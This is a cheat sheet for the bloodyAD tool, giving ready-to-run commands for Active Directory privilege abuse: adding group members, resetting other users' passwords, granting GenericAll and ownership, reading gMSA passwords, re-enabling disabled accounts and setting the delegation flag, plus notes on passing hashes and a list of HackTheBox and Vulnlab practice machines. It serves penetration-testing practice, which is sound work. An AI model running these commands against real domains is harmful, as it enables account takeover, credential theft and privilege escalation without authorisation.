BloodyAD Cheatsheet
Retrieve User Information
1 | bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username |
Add User To Group
1 | bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add |
Change Password
1 | bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password |
Give User GenericAll Rights
1 | bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username |
WriteOwner
1 | bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username |
ReadGMSAPassword
1 | bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword |
Enable a Disabled Account
1 | bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE |
Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
1 | bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION |
Notes
- To use Kerberos, obtain a TGT and then pass
-kinstead of providing a username and password - You can pass a hash instead of the password
Resources
- https://github.com/CravateRouge/bloodyAD/wiki/User-Guide
- https://0xdf.gitlab.io/2024/03/30/htb-rebound.html
- https://www.thehacker.recipes/
Machines To Practice
- Redelegate (Vulnlab)
- Vintage (HackTheBox)
- Infiltrator (HackTheBox)
- Rebound (HackTheBox)
- Absolute (HackTheBox)
- Certified (HackTheBox)
